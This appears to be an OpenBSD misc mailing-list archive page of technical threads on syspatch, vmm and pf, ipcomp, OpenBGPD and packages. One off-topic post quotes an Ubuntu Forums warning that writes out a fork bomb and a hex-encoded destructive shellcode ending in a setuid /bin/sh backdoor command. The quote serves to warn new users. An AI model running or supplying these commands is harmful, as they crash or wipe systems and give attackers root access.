Re: syspatch, relink and kernel version/date

2018-12-20 Thread Kapetanakis Giannis
On 20/12/2018 18:58, lists+m...@ggp2.com wrote:
> I can't confirm, but I think I noticed this on a box that was using the
> MP kernel even though it was an SP machine.

You are right. It is a single cpu machine running MP kernel.
So is this patched or not?

G
 
> On Thu, Dec 20, 2018 at 12:14:14PM +0200, Kapetanakis Giannis wrote:
>> Hi,
>>
>> I'm a bit confused about syspatch and kernel updates. One of machines after 
>> latest syspatch (009) and after reboot it lists old kernel date.
>>
>> This happens only on this machine. I've seen it happen before, not sure if 
>> it was on the same one or some other box.
>>
>> machine1:
>> # syspatch -l
>> 001_xserver
>> 002_syspatch
>> 003_portsmash
>> 004_lockf
>> 005_perl
>> 006_uipc
>> 007_smtpd
>> 008_qcow2
>> 009_recvwait
>>
>> # uname -prsv
>> OpenBSD 6.4 GENERIC.MP#364 amd64
>>
>> # sysctl kern.version
>> kern.version=OpenBSD 6.4 (GENERIC.MP) #364: Thu Oct 11 13:30:23 MDT 2018
>> dera...@amd64.openbsd.org:/usr/src/sys/arch/amd64/compile/GENERIC.MP
>>
>> machine2:
>> # syspatch -l
>> 001_xserver
>> 002_syspatch
>> 003_portsmash
>> 004_lockf
>> 005_perl
>> 006_uipc
>> 007_smtpd
>> 008_qcow2
>> 009_recvwait
>>
>> # uname -prsv
>> OpenBSD 6.4 GENERIC.MP#2 amd64
>>
>> # sysctl kern.version
>> kern.version=OpenBSD 6.4 (GENERIC.MP) #2: Tue Dec 18 13:17:16 CET 2018
>> 
>> r...@syspatch-64-amd64.openbsd.org:/usr/src/sys/arch/amd64/compile/GENERIC.MP
>>
>> on machine1 relink.log seems fine:
>> # cat /usr/share/relink/kernel/GENERIC.MP/relink.log 
>> (SHA256) /bsd: OK
>> LD="ld" sh makegap.sh 0x
>> ld -T ld.script -X --warn-common -nopie -o newbsd ${SYSTEM_HEAD} vers.o 
>> ${OBJS}
>> textdatabss dec hex
>> 104959482796320 671744  13964012d512ec
>> mv newbsd newbsd.gdb
>> ctfstrip -S -o newbsd newbsd.gdb
>> mv -f newbsd bsd
>> umask 077 && cp bsd /nbsd && mv /nbsd /bsd &&  sha256 -h 
>> /var/db/kernel.SHA256 /bsd
>>
>> Kernel has been relinked and is active on next reboot.
>>
>> SHA256 (/bsd) = 
>> 8b216c359324a4a938bd35c2c97416b62ffec8c8b955f8b86d65ddf9dc0d71b1
>>
>> Also /bsd has newer date so it seems updated.
>> # ls -ld /bsd
>> -rwx--  1 root  wheel  15461926 Dec 19 10:04 /bsd*
>>
>> # ls -ld /usr/share/relink/kernel/GENERIC.MP/relink.log
>> -rw-r--r--  1 root  wheel  486 Dec 19 10:04 
>> /usr/share/relink/kernel/GENERIC.MP/relink.log
>>
>> can someone explain this?
>>
>> thanks
>>
>> G
>>
> 



Re: I am revolted against the injustice of Ubuntu Forums administrators and moderators .

2018-12-20 Thread Solene Rapenne
Command FreeBSD  wrote:
> Hi,
> 
> The article that have spoken about Linux malicious commands that was posted
> in Ubuntu Forums was restored, but who accessed this link yesterday and
> this morning saw that this article has been deleted.

hello

this is the wrong mailing list, you are on misc@openbsd.org where threads are
about OpenBSD.



I am revolted against the injustice of Ubuntu Forums administrators and moderators .

2018-12-20 Thread Command FreeBSD
Hi,

The article that have spoken about Linux malicious commands that was posted
in Ubuntu Forums was restored, but who accessed this link yesterday and
this morning saw that this article has been deleted.

Very strange!

I also posted this topic in Ask Ubuntu Estack Overflow Exchange:
https://askubuntu.com/questions/1103483/why-the-article-that-have-spoken-about-linux-malicious-commands-that-was-posted?noredirect=1#comment1819053_1103483

I want to tell for the newbies to Linux that the article that have spoken
about Linux malicious commands that was posted in Ubuntu Forums was
deleted: https://ubuntuforums.org/announcement.php?f=326

The following messages was written in this article that was posted in
Ubuntu Forums:

[quote] Ubuntu Forums has a strict zero-tolerance policy when it comes to
posting dangerous commands. In the past members have been banned for
posting dangerous commands. If the intent is malicious, this is simply
unnacceptable. If it is meant as a joke – it is not funny.

Please be cautious when a command is suggested or if directed to download
script/s as a solution to a problem. When in doubt as to the safety of the
procedure, it's always a good idea to wait for more opinions, and/or have
the command explained and verify if the explanation makes sense by
consulting readily available documentation on Linux commands (such as
manpages). If you have any doubts about the content of a command or script,
report the post/thread and forum staff will investigate.

Please take care when posting commands or scripts to assist other users.
Post only well known, documented and current commands appropriate for the
operating system in use, or scripts from reputable sources. If you do post
commands in order to help someone but which have the potential to be
dangerous, always make sure you warn possible users of the dangers, not
just to the user you are helping, but others who may come across the post
later. If posting scripts that help with various tasks, please be prepared
to provide a source and description of the content. [/quote]

[quote] Forkbomb: It is a malicious script that will execute a huge number
of processes until your system freezes, forcing you to do a hard reboot
which may cause data corruption or data damage.

The below command looks really intriguing and curiosity may lead new and
inexperienced users to execute it! DON'T EXECUTE THEM! [/quote]

[code] :(){ :|:& };:[/code]

[quote] The below command is nothing but the first command above (rm -rf).
Here the codes are hidden in hex so that an ignorant user may be fooled.
Running the below code in your terminal will wipe your root partition.

This command here shows that the threat may be hidden and not normally
detectable sometimes. You must be aware of what you are doing and what
would be the result. Don’t compile/run codes from an unknown source.

char esp[] *attribute* ((section(“.text”))) /* e.s.p release */ =
“\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
“\x6e\x2f\x73\x68\x00\x2d\x63\x00″ “cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”; [/quote]

The messages that I quoted above was written in following link:
https://ubuntuforums.org/announcement.php?f=326

This article have opoken about Linux malicious commands.

Why this article that have spoken about Linux malicious commands that was
posted in Ubuntu Forums was deleted?

I posted this topic in Ubuntu Forums, but this topic was moved to The Jail
and then deleted.

It appears that Ubuntu Forums administrators want to fool the newbies.

EDIT:

I want to tell for the newbies to Linux that the article that have spoken
about Linux malicious commands that was posted in Ubuntu Forums was deleted
and that it appears that Ubuntu Forums administrators want to fool the
newbies: https://ubuntuforums.org/announcement.php?f=326

Who accessed the Ubuntu Forums this morning saw that I posted about
malicious commands in General Help and News to Ubuntu in Ubuntu Forums, but
the topics that I posted in Ubuntu Forums was deleted. Very strange! It
appears that Ubuntu Forums administrators want to fool the newbies.


I also posted this topic in debian users and ubuntu users mailing lists:


https://lists.debian.org/debian-user/2018/12/msg00573.html

https://lists.ubuntu.com/archives/ubuntu-users/2018-December/296077.html

I am revolted against the injustice of Ubuntu Forums administrators and
moderators .


Re: Confusion re. VMs, bridges, intergace groups and pf.

2018-12-20 Thread Theo de Raadt
cho...@jtan.com wrote:

> Additionally, under which circumstances could/should I use interface
> groups and under which rdomains? I cannot discern any practical
> difference between them except in how they're labeled (numeric vs.
> symbolic) although I confess that my experience with network routing
> has been tainted by the Other OS so my knowledge is there murky.

they are completely different

interface groups cluster a set of interfaces for name-reference in pf (and
a few other tools) (so you don't need to list them by actual name)

rdomains on the other hand steer packets



Re: Confusion re. VMs, bridges, intergace groups and pf.

2018-12-20 Thread chohag
Additionally, under which circumstances could/should I use interface
groups and under which rdomains? I cannot discern any practical
difference between them except in how they're labeled (numeric vs.
symbolic) although I confess that my experience with network routing
has been tainted by the Other OS so my knowledge is there murky.

Matthew



Re: TLS suddenly not working over IKED site-to-site - SOLVED?

2018-12-20 Thread Theodore Wynnychenko
> -Original Message- 
> From: owner-m...@openbsd.org [mailto:owner-m...@openbsd.org] On Behalf 
> Of William Ahern 
> Sent: Monday, December 17, 2018 1:11 PM 
> To: Theodore Wynnychenko 
> Cc: misc@openbsd.org 
> Subject: Re: TLS suddenly not working over IKED site-to-site 
> 
. 
. 
. 
> I'm not well versed in these issues but if I were in your shoes I would 
> 
> 1) Figure out why those packets were unprotected. (Could be normal for 
> all I 
> know, but in a quick test on my enc0 I didn't see any packets like 
> that.) 
> 
> 2) Make sure the tunnel handles fragmentation correctly. Are fragments 
> being 
> dropped? Are reassembled fragments being dropped? 
> 
> 2.a) Relatedly, make sure the tunnel handles pMTU discovery. Do ICMP 
> Fragmentation Needed packets make it back through the tunnel? pMTU and 
> ICMP 
> issues are very common with IPSec tunnels. IME most people "fix" these 
> issues by forcing a lower MSS or setting a lower MTU at the ingress 
> point 
> rather than properly configuring routing so ICMP errors are properly 
> routed. 
> I've experienced this issue myself and had to learn the hard way. 
> 
> 3) From an earlier post it looks like you're using ipcomp. You should 
> remove 
> this complication while debugging. It's possible ipcomp is hiding MTU 
> issues. 


Thank you so much for the suggestions. 

To summarize, I have noticed that in the last month, SSL/TLS connections were 
failing when traversing an ipsec tunnel created by iked.

This had worked stably for over a year, with no changes to iked.conf or 
pf.conf. 

In trying to find the issue, I had added "max-mss" to pf and tried decreasing 
MTU values on the adapters.  This did not seem to make a difference.

In addition, the problem was very sporadic, and seemed to "evolve" over the 
last few weeks.  In the last few days, I was able to establish https 
connections over the tunnel when that connection was initiated by the gateway 
openbsd machine or a Mac on the "local" network; but connections from another 
openbsd machine "behind" the gateway, and a Windows 7 machine kept hanging.

Anyway, I decided to revert everything to the way it was.  I removed all 
"max-mss" entries and reset MTU values to 1500.

Then, I took the advice above, and disable ipcomp on the tunnel, and, BAHM, 
https (and imaps) were working without an issue from openbsd, Windows 7, and 
Macs!

Just to be sure, I updated this am to the 12/19 amd64 snapshot. 

When I turn on ipcomp, https/imaps hangs for most connections; when I turn 
ipcomp off, https/imaps works. 

I noticed that the last change to sys/netinet/ip_ipcomp.c (I am guessing this 
is the code that is involved) in the log (I think) was about 3 months ago, and 
at this point, I can't recall if my last updated (prior to the one where the 
instability began) was before or after that change.

I was going to try to recompile it with the change undone, but am not sure how 
to do that, or even if it can be done for just that one part of sys.

And, after removing ipcomp from iked.conf, my subjective observation is that 
things load a lot faster than they seemed to in the past with ipcomp on; so, I 
am happy with where I am.

I was just posting my observations in case anyone else has a similar issue. 

Ted 




Confusion re. VMs, bridges, intergace groups and pf.

2018-12-20 Thread chohag
Something in the documentation regarding VM network iterface groups is
unclear to me.

I have created a switch and VM in /etc/vm.conf:

  switch "private" {
interface bridge0
group private
  }

  vm "test" {
memory 2G
disable
disk /srv/vm/test.img
interface { switch "private" }
  }

Which correctly creates a tap device with the group when started:

  tap0: flags=8943 mtu 1500
  lladdr fe:e1:ba:d9:26:d5
  description: vm4-if0-test
  index 15 priority 0 llprio 3
  groups: tap private
  status: active

The bridge is configured as:

  /etc/hostname.bridge0:add vether0
  /etc/hostname.vether0:inet 192.168.42.1 255.255.255.0

So far all well and good but attempting to craft pf rules to filter 'on
private' apparently has no effect.

This if my /etc/pf.conf (comments sanitised):

  set skip on lo

  block
  match in all scrub (no-df random-id max-mss 1440)
  antispoof quick for { egress wlan }

  match log on private proto tcp

  # NAT everything else
  match out on egress inet from !(egress:network) to !self nat-to (egress)

  # Permit inbound ssh
  pass in quick proto tcp from any to self port ssh

  # Open everything during testing
  pass quick

Specifically, the match log line doesn't record anything (verified with
tcpdump -i pflog0) with 'on private' but does with 'on vether'. So how
can I filter based on the interface group to which a VM or switch is
assigned as vm.conf(5) claims I can (in VM CONFIGURATION/interface/group)?

Have I made a mistake in my configuration somewhere, misunderstood the
documentation and how to use interface groups, or is this a bug? I am
using a freshly-installed 6.4 on amd64.

Thanks,

Matthew



Re: Missing libraries after upgrade to 6.4

2018-12-20 Thread John Ankarström

Tom Smyth wrote:

Hello John,


Hi!


do you have PKG_PATH Variable set to  an old version ?
eg
export PKG_PATH=https://fastly.cdn.openbsd.org/pub/OpenBSD/$(6.3/packages/amd64/

export PKG_PATH=https://fastly.cdn.openbsd.org/pub/OpenBSD/$(uname
-r)/packages/$(uname -p)/

you can remove the PKG_PATH  variable as installurl now helps
find the correct packages from your favourite mirror


and simply populate /etc/installurl
with the url of your favourite mirror,
man installurl for more details


Unfortunately, I already use /etc/installurl (with 
https://cdn.openbsd.org/pub/OpenBSD) and have $PKG_PATH unset.


Best regards,
John



Re: OpenBGPD Route Reflector - not reflecting VPNv4 Routes

2018-12-20 Thread Henry Bonath
Thank you Claudio!

I didn't even think of that, as these Route Reflectors are completely
out-of-band and not in the path of routing at all.
Of course they wouldn't work without having a route to the nexthop :-)

I'm much more versed in troubleshooting BGP on IOS, but with all the
work you just put into OpenBGPD I wanted to put it to the task.

Thanks so much for your help! It is working now:

RR$ bgpctl show ip bgp nei 100.92.127.37 out
flags: * = Valid,  = Selected, I = via IBGP, A = Announced,
   S = Stale, E = Error
origin validation state: N = not-found, V = valid, ! = invalid
origin: i = IGP, e = EGP, ? = Incomplete

flags ovs destination  gateway  lpref   med aspath origin
I*> N rd 1234:5678 172.29.20.0/24 100.92.127.101 100 0 i


On Thu, Dec 20, 2018 at 5:49 PM Claudio Jeker  wrote:
>
> On Thu, Dec 20, 2018 at 04:52:34PM -0500, Henry Bonath wrote:
> > Hello, I am having an issue with some route-reflectors I set up to try
> > to support a new MPLS backbone.
> > The majority of the MPLS Routers are Cisco IOS, with some of the PE
> > devices running OpenBSD.
> > The Route Reflectors are OpenBSD 6.4. The route reflectors are not
> > neighbors of each other.
> >
> > Here is my config:
> > 
> > ASN="1234"
> > AS $ASN
> > router-id 172.16.16.211
> >
> > group "IBGP" {
> > remote-as $ASN
> > announce IPv4 vpn
> > route-reflector 172.16.16.211
> > local-address 172.16.16.211
> > neighbor 100.92.64.0/18 {
> > }
> >
> > }
> > # IBGP: allow all updates to and from our IBGP neighbors
> > allow from any
> > allow to any
> >
> > 
> >
> > On the reflectors themselves, if I issue a "bgpctl show rib" I do see
> > VPNv4 routes, and "bgpctl show summary" I see that I am receiving
> > prefixes:
> > 
> > RR$ bgpctl show rib
> > flags: * = Valid, > = Selected, I = via IBGP, A = Announced,
> >S = Stale, E = Error
> > origin validation state: N = not-found, V = valid, ! = invalid
> > origin: i = IGP, e = EGP, ? = Incomplete
> >
> > flags ovs destination  gateway  lpref   med aspath origin
> > I   N rd 1234:5678 10.25.80.0/24 100.92.127.20  100 0 ?
> > I   N rd 1234:5678 172.29.20.0/24 100.92.127.101 100 0 i
> > 
>
> These routes are not valid (*) is missing. Which does result in them not
> being selected and because of that not reflected. At least I would look
> into that. Normally this is cause because the nexthop is not valid. Maybe
> you need to add the IGP routes or in the worst case use 'nexthop qualify
> via default'.
>
> > If I do the same on a PE, it shows Zero prefixes received from either
> > route reflector:
> > 
> > PE$ bgpctl show rib
> > flags: * = Valid, > = Selected, I = via IBGP, A = Announced,
> >S = Stale, E = Error
> > origin validation state: N = not-found, V = valid, ! = invalid
> > origin: i = IGP, e = EGP, ? = Incomplete
> >
> > flags ovs destination  gateway  lpref   med aspath origin
> > I*> N rd 1234:5678 10.25.80.0/24 100.92.127.20  100 0 ?
> > AI*>N rd 1234:5678 172.29.20.0/24 rd 0:0 0.0.0.0 100 0 i
> > [hbonath@hb-mplspe-01]:~$ bgpctl show summ
> > Neighbor   ASMsgRcvdMsgSent  OutQ Up/Down  
> > State/PrfRcvd
> > bgp-rr-02   1234 41 42 0 00:19:08  0
> > bgp-rr-01   1234 41 42 0 00:19:08  0
> > 
> >
> > What am I missing here? Does it have to do with the flags that the
> > Route-Reflector is showing?
> > Thanks in advance!
> >
>
> --
> :wq Claudio
>



X-Accel-Redirect equivalent for httpd

2018-12-20 Thread Chris Narkiewicz

Hi,

Is there an equivalent or alternative for NginX X-Accel-Redirect?

https://www.nginx.com/resources/wiki/start/topics/examples/x-accel/

I'm porting a django app that checks for user's permissions before 
allowing them to download a document and this function uses 
X-Accel-Redirect to achieve this.


I'd like to move the app to OpenBSD httpd. Any idea how to
crach this problem?

Best regards,
Chris



Re: Missing libraries after upgrade to 6.4

2018-12-20 Thread Tom Smyth
Hello John,

do you have PKG_PATH Variable set to  an old version ?
eg
export PKG_PATH=https://fastly.cdn.openbsd.org/pub/OpenBSD/$(6.3/packages/amd64/

export PKG_PATH=https://fastly.cdn.openbsd.org/pub/OpenBSD/$(uname
-r)/packages/$(uname -p)/

you can remove the PKG_PATH  variable as installurl now helps
find the correct packages from your favourite mirror


and simply populate /etc/installurl
with the url of your favourite mirror,
man installurl for more details

I hope this helps
Tom Smyth


On Thu, 20 Dec 2018 at 22:13, John Ankarström  wrote:
>
> Hello all,
>
> I have this port [1] that installed fine on 6.3, but after I upgraded to
> 6.4, following the FAQ, I'm getting weird errors.
>
> When running make install, it fails because qtbase-5.9.4 can't be
> installed, which is weird that it wants to do, because the version in
> ports is 5.9.6p1.  Here's the output: http://sprunge.us/z6d97h
>
> When I try to run make rebuild, it complains about missing libraries for
> Qt5 stuff: http://sprunge.us/oEDaKE
>
> Some proof that I've actually upgraded:
>
> $ uname -a
> OpenBSD lbsd.home 6.4 GENERIC.MP#364 amd64
>
> $ cd /usr/ports; cvs status Makefile
> [...]
> Sticky Tag:  OPENBSD_6_4 (branch: 1.77.2)
> [...]
>
> Anybody got any idea as to what's going on?
>
> Best regards,
> John
>
> [1]:
> https://files.jkvinge.net/packages/strawberry/strawberry-openbsd-port.tar.gz
>


-- 
Kindest regards,
Tom Smyth

Mobile: +353 87 6193172
The information contained in this E-mail is intended only for the
confidential use of the named recipient. If the reader of this message
is not the intended recipient or the person responsible for
delivering it to the recipient, you are hereby notified that you have
received this communication in error and that any review,
dissemination or copying of this communication is strictly prohibited.
If you have received this in error, please notify the sender
immediately by telephone at the number above and erase the message
You are requested to carry out your own virus check before
opening any attachment.



Re: blocking openvpn port scanners

2018-12-20 Thread Steve Fairhead

On 20/12/2018 13:20, tors...@cnc-london.net wrote:

Try to add below to your pf.conf

table  persist

  pass in on $ext_if inet proto tcp from any to $ext_if port 1194 \
 (max-src-conn 10, max-src-conn-rate 30/5, \
  overload  flush global)


This is pretty much exactly what I have for ssh scanners (with different 
limits). Aha!


On 20/12/2018 13:20, pe...@bsdly.net wrote:
> The good thing about the pf.conf state tracking options is that they're
> service agnostic.

That's the bit I wasn't entirely sure about - thanks. Makes sense now - 
of course! It's nothing to do with service, just connections. D'oh!


I now have a cunning plan, a plan so cunning etc etc. Thanks to all who 
responded, on- and off-list.


Steve



Re: OpenBGPD Route Reflector - not reflecting VPNv4 Routes

2018-12-20 Thread Claudio Jeker
On Thu, Dec 20, 2018 at 04:52:34PM -0500, Henry Bonath wrote:
> Hello, I am having an issue with some route-reflectors I set up to try
> to support a new MPLS backbone.
> The majority of the MPLS Routers are Cisco IOS, with some of the PE
> devices running OpenBSD.
> The Route Reflectors are OpenBSD 6.4. The route reflectors are not
> neighbors of each other.
> 
> Here is my config:
> 
> ASN="1234"
> AS $ASN
> router-id 172.16.16.211
> 
> group "IBGP" {
> remote-as $ASN
> announce IPv4 vpn
> route-reflector 172.16.16.211
> local-address 172.16.16.211
> neighbor 100.92.64.0/18 {
> }
> 
> }
> # IBGP: allow all updates to and from our IBGP neighbors
> allow from any
> allow to any
> 
> 
> 
> On the reflectors themselves, if I issue a "bgpctl show rib" I do see
> VPNv4 routes, and "bgpctl show summary" I see that I am receiving
> prefixes:
> 
> RR$ bgpctl show rib
> flags: * = Valid, > = Selected, I = via IBGP, A = Announced,
>S = Stale, E = Error
> origin validation state: N = not-found, V = valid, ! = invalid
> origin: i = IGP, e = EGP, ? = Incomplete
> 
> flags ovs destination  gateway  lpref   med aspath origin
> I   N rd 1234:5678 10.25.80.0/24 100.92.127.20  100 0 ?
> I   N rd 1234:5678 172.29.20.0/24 100.92.127.101 100 0 i
> 

These routes are not valid (*) is missing. Which does result in them not
being selected and because of that not reflected. At least I would look
into that. Normally this is cause because the nexthop is not valid. Maybe
you need to add the IGP routes or in the worst case use 'nexthop qualify
via default'.
 
> If I do the same on a PE, it shows Zero prefixes received from either
> route reflector:
> 
> PE$ bgpctl show rib
> flags: * = Valid, > = Selected, I = via IBGP, A = Announced,
>S = Stale, E = Error
> origin validation state: N = not-found, V = valid, ! = invalid
> origin: i = IGP, e = EGP, ? = Incomplete
> 
> flags ovs destination  gateway  lpref   med aspath origin
> I*> N rd 1234:5678 10.25.80.0/24 100.92.127.20  100 0 ?
> AI*>N rd 1234:5678 172.29.20.0/24 rd 0:0 0.0.0.0 100 0 i
> [hbonath@hb-mplspe-01]:~$ bgpctl show summ
> Neighbor   ASMsgRcvdMsgSent  OutQ Up/Down  
> State/PrfRcvd
> bgp-rr-02   1234 41 42 0 00:19:08  0
> bgp-rr-01   1234 41 42 0 00:19:08  0
> 
> 
> What am I missing here? Does it have to do with the flags that the
> Route-Reflector is showing?
> Thanks in advance!
> 

-- 
:wq Claudio



OpenBGPD Route Reflector - not reflecting VPNv4 Routes

2018-12-20 Thread Henry Bonath
Hello, I am having an issue with some route-reflectors I set up to try
to support a new MPLS backbone.
The majority of the MPLS Routers are Cisco IOS, with some of the PE
devices running OpenBSD.
The Route Reflectors are OpenBSD 6.4. The route reflectors are not
neighbors of each other.

Here is my config:

ASN="1234"
AS $ASN
router-id 172.16.16.211

group "IBGP" {
remote-as $ASN
announce IPv4 vpn
route-reflector 172.16.16.211
local-address 172.16.16.211
neighbor 100.92.64.0/18 {
}

}
# IBGP: allow all updates to and from our IBGP neighbors
allow from any
allow to any



On the reflectors themselves, if I issue a "bgpctl show rib" I do see
VPNv4 routes, and "bgpctl show summary" I see that I am receiving
prefixes:

RR$ bgpctl show rib
flags: * = Valid, > = Selected, I = via IBGP, A = Announced,
   S = Stale, E = Error
origin validation state: N = not-found, V = valid, ! = invalid
origin: i = IGP, e = EGP, ? = Incomplete

flags ovs destination  gateway  lpref   med aspath origin
I   N rd 1234:5678 10.25.80.0/24 100.92.127.20  100 0 ?
I   N rd 1234:5678 172.29.20.0/24 100.92.127.101 100 0 i


If I do the same on a PE, it shows Zero prefixes received from either
route reflector:

PE$ bgpctl show rib
flags: * = Valid, > = Selected, I = via IBGP, A = Announced,
   S = Stale, E = Error
origin validation state: N = not-found, V = valid, ! = invalid
origin: i = IGP, e = EGP, ? = Incomplete

flags ovs destination  gateway  lpref   med aspath origin
I*> N rd 1234:5678 10.25.80.0/24 100.92.127.20  100 0 ?
AI*>N rd 1234:5678 172.29.20.0/24 rd 0:0 0.0.0.0 100 0 i
[hbonath@hb-mplspe-01]:~$ bgpctl show summ
Neighbor   ASMsgRcvdMsgSent  OutQ Up/Down  State/PrfRcvd
bgp-rr-02   1234 41 42 0 00:19:08  0
bgp-rr-01   1234 41 42 0 00:19:08  0


What am I missing here? Does it have to do with the flags that the
Route-Reflector is showing?
Thanks in advance!



Missing libraries after upgrade to 6.4

2018-12-20 Thread John Ankarström

Hello all,

I have this port [1] that installed fine on 6.3, but after I upgraded to 
6.4, following the FAQ, I'm getting weird errors.


When running make install, it fails because qtbase-5.9.4 can't be 
installed, which is weird that it wants to do, because the version in 
ports is 5.9.6p1.  Here's the output: http://sprunge.us/z6d97h


When I try to run make rebuild, it complains about missing libraries for 
Qt5 stuff: http://sprunge.us/oEDaKE


Some proof that I've actually upgraded:

$ uname -a
OpenBSD lbsd.home 6.4 GENERIC.MP#364 amd64

$ cd /usr/ports; cvs status Makefile
[...]
Sticky Tag:  OPENBSD_6_4 (branch: 1.77.2)
[...]

Anybody got any idea as to what's going on?

Best regards,
John

[1]: 
https://files.jkvinge.net/packages/strawberry/strawberry-openbsd-port.tar.gz




Re: Automated remote install

2018-12-20 Thread chohag
Philipp Buehler writes:
> Am 20.12.2018 19:24 schrieb cho...@jtan.com:
> > I'm not sure what you mean by that. The script I posted the other day
> > is part of a (working, tested) process to create an openbsd image
> > within openbsd and then upload it to aws as an iam. I based it on, I
> > think, an earlier version of the instructions linked above. No linux
> > or osx required (no osx even present).
> 
> News to me that vagrant and esp. virtualbox is available on OpenBSD.

Well obviously I didn't use those, they're shit. Which part of "based it on" 
wasn't clear? I used vmm and sh, which make the 'standing up a vm' part of the 
process so simple that the scripts which implement it barely deserve the name.

Matthew



Re: Automated remote install

2018-12-20 Thread Philipp Buehler

Am 20.12.2018 19:24 schrieb cho...@jtan.com:

I'm not sure what you mean by that. The script I posted the other day
is part of a (working, tested) process to create an openbsd image
within openbsd and then upload it to aws as an iam. I based it on, I
think, an earlier version of the instructions linked above. No linux
or osx required (no osx even present).


News to me that vagrant and esp. virtualbox is available on OpenBSD.


--
pb



Re: Automated remote install

2018-12-20 Thread chohag
Philipp Buehler writes:
> Am 20.12.2018 18:13 schrieb David Diggles:
> > However it's possible to build for AWS.
> > https://github.com/ajacoutot/aws-openbsd
> 
> and there's more stuff "in the pipe", since the above
> needs a Linux or OSX environment
> 
> Next year ;) it'll be possible to do this on OpenBSD 
> (vmm/packer/vagrant).

I'm not sure what you mean by that. The script I posted the other day is part 
of a (working, tested) process to create an openbsd image within openbsd and 
then upload it to aws as an iam. I based it on, I think, an earlier version of 
the instructions linked above. No linux or osx required (no osx even present).

Matthew



Re: radeondrm failure on amd64 but not on i386?

2018-12-20 Thread Daniel Dickman



> On Dec 19, 2018, at 10:22 AM, Andy Bradford 
>  wrote:
> 
> Thus said Daniel Dickman on Fri, 14 Dec 2018 20:45:11 -0500:
> 
>> Try  previous releases  of OpenBSD/amd64  to check  if radeondrm  ever
>> worked for you on amd64.
> 
> That  was a  fruitful suggestion.  I tried  6.3 amd64  and it  works. So
> somewhere after  6.3 a change  was introduced that made  this particular
> Radeon card not work. I'll see if  I can discover which. What's the best
> way to bisect with CVS; update sources by date/time?

It was probably the big update to resync radeondrm with the linux 4.4.x kernel. 
Believe that happened shortly after 6.3 was released. Previous to this, 
radeondrm was synced against the linux 3.8.x kernel.

https://github.com/openbsd/src/commit/7ccd5a2c19d4480fd59ed7bbf02608c8980a7858

If you really wanted to bisect this you can use the github mirror. it would be 
interesting if the drm update is *not* the commit that broke things. anyway 
think you might be able to start with openbsd 6.3, install git package, 
download the git tree from github then bisect and recompile the kernel and 
reboot. (hopefully doesn’t need a full build of base here).

> 
>> If you  diff the dmesgs is  there any other on
>> already been reported?
> 
> I don't believe there were any other significant diffences.

btw I saw a note from kettenis@ that a drm update is being worked on:
https://marc.info/?l=openbsd-bugs=154512499015162=2

just fyi.



Re: Automated remote install

2018-12-20 Thread Philipp Buehler

Am 20.12.2018 18:13 schrieb David Diggles:

However it's possible to build for AWS.
https://github.com/ajacoutot/aws-openbsd


and there's more stuff "in the pipe", since the above
needs a Linux or OSX environment

Next year ;) it'll be possible to do this on OpenBSD 
(vmm/packer/vagrant).


ciao
--
pb



Re: Automated remote install

2018-12-20 Thread David Diggles




>Note that I'm referring to KVM providers (traditional VPS providers),
>not
>"public cloud".  The big boys - AWS, Azure, Google, etc. are not
>interested
>in OpenBSD.

However it's possible to build for AWS.
https://github.com/ajacoutot/aws-openbsd



Re: syspatch, relink and kernel version/date

2018-12-20 Thread lists+misc
I can't confirm, but I think I noticed this on a box that was using the
MP kernel even though it was an SP machine.

On Thu, Dec 20, 2018 at 12:14:14PM +0200, Kapetanakis Giannis wrote:
> Hi,
> 
> I'm a bit confused about syspatch and kernel updates. One of machines after 
> latest syspatch (009) and after reboot it lists old kernel date.
> 
> This happens only on this machine. I've seen it happen before, not sure if it 
> was on the same one or some other box.
> 
> machine1:
> # syspatch -l
> 001_xserver
> 002_syspatch
> 003_portsmash
> 004_lockf
> 005_perl
> 006_uipc
> 007_smtpd
> 008_qcow2
> 009_recvwait
> 
> # uname -prsv
> OpenBSD 6.4 GENERIC.MP#364 amd64
> 
> # sysctl kern.version
> kern.version=OpenBSD 6.4 (GENERIC.MP) #364: Thu Oct 11 13:30:23 MDT 2018
> dera...@amd64.openbsd.org:/usr/src/sys/arch/amd64/compile/GENERIC.MP
> 
> machine2:
> # syspatch -l
> 001_xserver
> 002_syspatch
> 003_portsmash
> 004_lockf
> 005_perl
> 006_uipc
> 007_smtpd
> 008_qcow2
> 009_recvwait
> 
> # uname -prsv
> OpenBSD 6.4 GENERIC.MP#2 amd64
> 
> # sysctl kern.version
> kern.version=OpenBSD 6.4 (GENERIC.MP) #2: Tue Dec 18 13:17:16 CET 2018
> 
> r...@syspatch-64-amd64.openbsd.org:/usr/src/sys/arch/amd64/compile/GENERIC.MP
> 
> on machine1 relink.log seems fine:
> # cat /usr/share/relink/kernel/GENERIC.MP/relink.log 
> (SHA256) /bsd: OK
> LD="ld" sh makegap.sh 0x
> ld -T ld.script -X --warn-common -nopie -o newbsd ${SYSTEM_HEAD} vers.o 
> ${OBJS}
> textdatabss dec hex
> 104959482796320 671744  13964012d512ec
> mv newbsd newbsd.gdb
> ctfstrip -S -o newbsd newbsd.gdb
> mv -f newbsd bsd
> umask 077 && cp bsd /nbsd && mv /nbsd /bsd &&  sha256 -h 
> /var/db/kernel.SHA256 /bsd
> 
> Kernel has been relinked and is active on next reboot.
> 
> SHA256 (/bsd) = 
> 8b216c359324a4a938bd35c2c97416b62ffec8c8b955f8b86d65ddf9dc0d71b1
> 
> Also /bsd has newer date so it seems updated.
> # ls -ld /bsd
> -rwx--  1 root  wheel  15461926 Dec 19 10:04 /bsd*
> 
> # ls -ld /usr/share/relink/kernel/GENERIC.MP/relink.log
> -rw-r--r--  1 root  wheel  486 Dec 19 10:04 
> /usr/share/relink/kernel/GENERIC.MP/relink.log
> 
> can someone explain this?
> 
> thanks
> 
> G
> 



Re: Automated remote install

2018-12-20 Thread Frank Beuth

On Wed, Dec 19, 2018 at 07:24:12AM -0800, andrew fabbro wrote:

Virtually all of the better KVM hosts offer an OpenBSD ISO, and in my
experience, 100% will add it to their library if you request it.


That's an excellent idea, especially from the perspective of making OpenBSD 
adoption easier for others as well. ("click the button" vs "don't forget the 
